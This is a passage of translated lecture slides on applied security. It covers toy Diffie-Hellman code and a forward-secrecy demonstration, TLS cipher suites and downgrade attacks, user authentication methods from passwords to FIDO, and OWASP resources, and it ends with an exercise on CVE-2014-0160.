    Alice computes n = Gb^a mod p; Bob computes n = Ga^b mod p. n is the same value whichever way it is computed, and both derive the symmetric key from n.
    a and b cannot be learned from the Ga and Gb exchanged here.
  172. Diffie-Hellman key agreement

    #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    import random
    random.seed()

    # p and x are agreed with the peer in advance = visible to an eavesdropper
    p=152219 # any prime
    x=2      # any natural number >= 2 and < p

    # these values are never put on the wire = invisible to an eavesdropper
    secret1=random.randint(2,p)
    secret2=random.randint(2,p)
    print( u'Aliceが作った秘密の値: %d' % secret1 )
    print( u'Bobが作った秘密の値: %d' % secret2 )

    # these values are handed to the peer over the wire = visible to an eavesdropper
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'AliceからBobに送る値: %d' % public1 )
    print( u'BobからAliceに送る値: %d' % public2 )

    # these two values agree
    key1=pow( public2, secret1, p )
    key2=pow( public1, secret2, p )
    print( u'AliceがBobから貰った値で作った値: %d' % key1 )
    print( u'BobがAliceから貰った値で作った値: %d' % key2 )

    $ ./dh.py
    Aliceが作った秘密の値: 118909
    Bobが作った秘密の値: 89005
    AliceからBobに送る値: 26981
    BobからAliceに送る値: 123319
    AliceがBobから貰った値で作った値: 7243
    BobがAliceから貰った値で作った値: 7243
  173. Diffie-Hellman key agreement (same program and output as slide 172)

    The value 7243 was shared. A key for a symmetric-key cipher can be derived from this value.
  174. Diffie-Hellman Ephemeral (ephemeral = temporary)

    (Same program as slide 172.) The secret values, secret1 and secret2, are changed every time key agreement is performed.
    Without these values the key cannot be determined, and the values themselves cannot be eavesdropped, so forward secrecy is obtained.
    Because the secret value changes every time, it can no longer be used to confirm that the peer is genuine; confirming that the peer is genuine is done with RSA instead.
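To make the difference between RSA key transport (slides 165 to 168) and ephemeral Diffie-Hellman (slide 174) concrete, here is an added example that is not part of the slides. It reuses the slides' toy RSA primes and DH parameters (far too small for real use): an eavesdropper records each handshake, later obtains the server's RSA private key, and tries to recover the session key. derive_key is a constructed stand-in for TLS's real key derivation.

```python
import hashlib
import random
from typing import Dict, Optional, Tuple

# Toy parameters taken from the slides' own examples.
P_RSA, Q_RSA, E = 116903, 215443, 139721        # RSA primes and public exponent (slide 156)
N_RSA = P_RSA * Q_RSA
D_RSA = pow(E, -1, (P_RSA - 1) * (Q_RSA - 1))   # private exponent (Python 3.8+ modular inverse)
DH_P, DH_G = 152219, 2                          # DH prime and generator (slide 172)


def derive_key(shared_secret: int) -> bytes:
    # Stand-in KDF: hash the shared secret. Not the TLS key schedule.
    return hashlib.sha256(shared_secret.to_bytes(8, 'big')).digest()


def rsa_key_transport_session(rng: random.Random) -> Tuple[bytes, Dict[str, int]]:
    """Slide 165: the client picks n and sends it encrypted to the server's RSA public key."""
    n = rng.randrange(2, N_RSA)
    transcript = {'enc_n': pow(n, E, N_RSA)}    # everything an eavesdropper can record
    return derive_key(n), transcript


def dhe_session(rng: random.Random) -> Tuple[bytes, Dict[str, int]]:
    """Slide 174: fresh a and b for this session; only x^a and x^b cross the wire."""
    a = rng.randrange(2, DH_P)
    b = rng.randrange(2, DH_P)
    ga, gb = pow(DH_G, a, DH_P), pow(DH_G, b, DH_P)
    n = pow(gb, a, DH_P)
    assert n == pow(ga, b, DH_P)                # both sides compute the same n
    transcript = {'ga': ga, 'gb': gb}
    # a and b go out of scope here; the RSA key only authenticated the exchange,
    # so nothing in the transcript is encrypted to it.
    return derive_key(n), transcript


def attacker_after_key_leak(transcript: Dict[str, int], d: int = D_RSA) -> Optional[bytes]:
    """Slide 167: with the leaked private exponent d, try to recover the session key from
    the recorded transcript. Returns None when the transcript holds no RSA ciphertext."""
    if 'enc_n' in transcript:
        return derive_key(pow(transcript['enc_n'], d, N_RSA))
    return None


def run_scenarios(seed: int = 1) -> Dict[str, bool]:
    """Record one session of each kind, leak the RSA key afterwards, and report what was recovered."""
    rng = random.Random(seed)
    key_rsa, t_rsa = rsa_key_transport_session(rng)
    key_dhe, t_dhe = dhe_session(rng)
    return {
        'rsa_session_recovered': attacker_after_key_leak(t_rsa) == key_rsa,   # True
        'dhe_session_recovered': attacker_after_key_leak(t_dhe) == key_dhe,   # False
    }


if __name__ == '__main__':
    for name, recovered in run_scenarios().items():
        print('%s: %s' % (name, recovered))
```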
  175. DHE-RSA-AES256-SHA256

    Whether TLS is using Diffie-Hellman key agreement can be seen from the name of the TLS cipher suite:
    DHE: Diffie-Hellman Ephemeral is used to share the symmetric key;
    RSA: RSA is used to confirm that the peer is genuine;
    AES256: data is encrypted with 256-bit AES;
    SHA256: to detect tampering with the data, a SHA-256 hash over the symmetric key and the data is used.
  176. The elliptic-curve discrete logarithm problem

    The discrete logarithm problem is one where inverting a result computed in logarithmic time takes exponential time. Since it is not impossible to invert, sufficiently large values must be used so that inversion takes a long time.
    For the elliptic-curve discrete logarithm problem, no method is known for inverting a result computed in logarithmic time. As long as no such method is discovered, values just large enough to withstand brute-force attacks suffice.

  177. Elliptic-curve Diffie-Hellman key agreement

    Diffie-Hellman key agreement using the elliptic-curve discrete logarithm problem instead of the discrete logarithm problem. In TLS it is written as Elliptic Curve Diffie-Hellman Ephemeral, ECDHE for short.
    Sizes recommended in RFC 7525 so that an eavesdropper cannot learn the key in realistic time at present: Diffie-Hellman key agreement: … bits; elliptic-curve Diffie-Hellman key agreement: … bits (the numbers did not survive extraction). https://tools.ietf.org/html/rfc7525
  178. What I want even those who did not follow all of this to remember

    Using cryptography correctly so that no information leaks to an eavesdropper is hard. Unless there is a special reason, use TLS.

  179. Because TLS is a protocol with a long history, it also supports cryptographic techniques that can no longer be called safe today.

    At connection time, TLS finds out which cryptographic techniques the server and the client can use and attempts to communicate with techniques both support. For example, it still supports 512-bit RSA and RC4, both breakable in realistic time today.
    Timeline: SSL 2.0 (1994), SSL 3.0 (1996), TLS 1.0 (1999), TLS 1.1 (2006), TLS 1.2 (2008), TLS 1.3 (coming soon).
  180. Timeline: SSL 2.0 (1994), SSL 3.0 (1996), TLS 1.0 (1999), TLS 1.1 (2006), TLS 1.2 (2008), TLS 1.3 (coming soon)

    In the 2010s, vulnerabilities appeared in which the attacker makes the parties pick an old cipher and then exploits the old cipher's weaknesses to eavesdrop.
    [diagram: Alice: "modern cipher OK" -> eavesdropper rewrites it to "modern cipher impossible" -> Bob; Bob: "modern cipher OK" -> eavesdropper rewrites it to "modern cipher impossible" -> Alice; both end up using a weak cipher, and the eavesdropper says "I can read it".]
  181. POODLE (CVE-2014-3566) https://nvd.nist.gov/vuln/detail/CVE-2014-3566

    A vulnerability from the 2010s in which the attacker makes the parties pick an old cipher and then exploits a weakness in the SSL 3.0 specification itself to eavesdrop.
    [slide image: NIST's description of POODLE]

  182. Timeline: SSL 2.0 (1994), SSL 3.0 (1996), TLS 1.0 (1999), TLS 1.1 (2006), TLS 1.2 (2008), TLS 1.3 (coming soon)

    In TLS 1.3, cryptographic techniques that are no longer safe are unusable from the start.
    Until TLS 1.3 becomes common, operate TLS 1.2 with the features considered dangerous switched off.
    Peers that only support really old ciphers such as SSL 3.0 will simply have to be told to give up communicating.
  183. RFC 7525: Recommendations for Secure Use of Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS)

    Summarises which TLS 1.2 features should be switched off.
    https://tools.ietf.org/html/rfc7525
    Unofficial Japanese translation: https://summerwind.jp/docs/rfc7525/
    [slide image: the RFC's Abstract]
  184. What I want even those who did not follow all of this to remember

    Using cryptography correctly so that no information leaks to an eavesdropper is hard. Unless there is a special reason, use TLS.
    When using TLS, switch off the old features that are no longer safe today (NEW!).

  185. Telling genuine users from fake ones

  186. Authentication

    Alice: "I'm Alice." A malicious third party pretending to be Alice: "I'm Alice."
    Unlike when checking that a server is genuine, users do not carry certificates.

  187. Password authentication

    The user authentication method that has been in use since long ago. If it is really Alice, she should know the password.
    Alice: "The password is ●●●●." A malicious third party pretending to be Alice: "…"

  188. The problem with password authentication

    If a user sets different passwords on many different services, the user forgets them.
    Alice: "…I forgot it." A malicious third party pretending to be Alice: "…"

  189. Secret questions

    "What is your favourite food?" Alice answers; server: "Correct. Please set a new password."
    This amounts to nothing more than making the password easier.

  190. OAuth-based login

    Users use many services; if they set an individual password on each, forgetting passwords is only natural.
    Most users have an account with Google, Facebook or the like. A service registers which pieces of information it needs.

  191. OAuth-based login

    User: "I want to log in to that service."
    Identity provider: "I'd be passing this much information to that service, OK?" User: "OK."
    Identity provider: "Please hand request token *** to that service."

  192. OAuth-based login

    User to the service: "Here is request token ***."
    Service to the identity provider: "Someone turned up with something called request token ***."
    Identity provider: "That is our Alice, please let her through. If you want Alice's details, use access token ???."

  193. OAuth-based login

    [slide image: the Niconico login screen]
    Users can use the service by logging in to the SNS or similar they use every day; they need neither remember nor type a password per service.
    The service provider can delegate the concrete user authentication entirely to another service.
    Example of a service making use of OAuth-based login: Niconico, https://account.nicovideo.jp/login
  194. Two-factor authentication

    The means of confirming that a user is genuine fall into three categories:
    1. something the user knows (password authentication and the like);
    2. something the user is (fingerprint authentication and the like);
    3. something the user has (showing an ID card and the like).
    Because everything other than 1 requires special equipment, most Internet services have traditionally used only 1.

  195. Phishing

    [diagram: the user types "the password is ●●●●" into the fake service, which forwards it to the genuine service]
    What the user knows has no resistance to phishing.
  196. Two-factor authentication

    1. something the user knows (password authentication and the like);
    2. something the user is (fingerprint authentication and the like);
    3. something the user has (showing an ID card and the like).
    Impersonation must be prevented by combining 1 with either 2 or 3.

  197. Two-factor authentication using SMS

    3. something the user has: does the user have the registered mobile phone?
    User: "The password is ●●●●." Server: "Please enter the number sent to you by SMS." User enters it. "Login successful."

  198. The problems with two-factor authentication using SMS

    If a malicious third party can peek at the SMS, the authentication is defeated. And typing in the number is a chore in the first place.
    Could a tool for doing two-factor authentication more safely and more conveniently be built?
  199. FIDO U2F https://www.yubico.com/products/yubikey-hardware/

    A device that proves, using public-key cryptography, that the user really has this USB device.
    [slide image: a FIDO U2F device that is actually on sale]

  200. Registering a user with FIDO U2F

    Server: requests key generation, attaching the AppID.
    Authenticator: creates a private key and a public key corresponding to the AppID; returns the public key, the authenticator's attestation certificate, and a signature made with the attestation certificate.
    Server: uses the signature to confirm that this is a trustworthy authenticator; stores the public key. Registration complete.
  201. Logging in with FIDO U2F

    Password authentication first: the server checks the password.
    Server: sends the AppID and a challenge.
    Authenticator: encrypts the challenge with the private key corresponding to the AppID and returns the encrypted challenge.
    Server: confirms that the challenge can be decrypted with the stored public key. Authentication complete.
  202. FIDO UAF

    Typing a password is a chore in the first place.
    1. something the user knows (password authentication and the like);
    2. something the user is (fingerprint authentication and the like);
    3. something the user has (showing an ID card and the like).
    Let's do two-factor authentication with 2 and 3, without using 1.

  203. FIDO UAF

    Because biometric authentication is required, complex hardware is needed, but the Xperia XZ1 has become the first device compliant with FIDO UAF 1.1 (article: https://fidoalliance.org/first-fido-uaf-1-1-implementations-ease-deployment-advanced-biometric-authentication-android-devices/).
    By supporting FIDO UAF, a service can offer password-free authentication to users of such devices.
    [slide image: the article reporting that the Xperia XZ1 is FIDO UAF compliant]
  204. Preparing for attacks on Web pages

  205. OWASP https://www.owasp.org/

    An open community that shares information and raises awareness for the sake of secure Web applications.
    [slide image: the OWASP top page]

  206. OWASP Top 10

    Ten representative Web application vulnerabilities, selected to alert Web application developers. https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf
    The latest edition is OWASP Top 10 2017, and a Japanese translation exists.
    [slide image: the cover of the OWASP Top 10]
  207. OWASP Top 10

    Injection; broken authentication; sensitive data exposure; XML external entities; broken access control; security misconfiguration; cross-site scripting; insecure deserialisation; using components with known vulnerabilities; insufficient logging and monitoring.
  208. OWASP Top 10 https://www.owasp.org/images/2/23/OWASP_Top_10-2017%28ja%29.pdf

    [slide image: the OWASP Top 10 explanation of injection]
    For each kind of vulnerability it summarises how to find it and how to prevent it. For example, the prevention of injection: avoid handing queries to an interpreter; use a parameterised interface or an ORM. Read it.
  209. OWASP Application Security Verification Standard

    [slide image: the cover of the OWASP ASVS]
    A collection of the items to check in order to verify the security of a Web application. The latest edition is OWASP ASVS 3.0.1, and a Japanese translation exists: https://www.jpcert.or.jp/securecoding/materials-owaspasvs.html
  210. OWASP Application Security Verification Standard https://www.jpcert.or.jp/securecoding/materials-owaspasvs.html

    [slide image: part of the ASVS checklist]
    Level 1: what every application should satisfy. Level 2: what applications handling personal information or information that must not be tampered with should satisfy. Level 3: what applications whose failure affects the survival of the organisation or human life should satisfy. The higher the level, the more items there are to check.
    Example item: check whether the password change function requires all three of entering the old password, entering the new password, and confirming the new password.
    Once you have built a Web application, go through the checklist.
  211. OWASP WebGoat https://github.com/WebGoat/WebGoat

    [slide image: OWASP WebGoat]
    A Web application written in Java with a variety of vulnerabilities deliberately built in. Useful when you want to learn about vulnerabilities hands-on, or want to confirm that the vulnerability checks you perform are correct.
  212. Finally

  213. All software security presupposes physical security.

    A "vulnerability" in which a malicious third party breaks into the server room and pulls the power cable to stop the service: software fundamentally has no answer to an attack like this.
    Lock the doors first; software security comes after that.

  214. Exercise: CVE-2014-0160

    Explain under what circumstances this vulnerability comes into play, what happens, and what adverse effects can be expected as a result.
    Describe at least one measure that could be taken to avoid this vulnerability.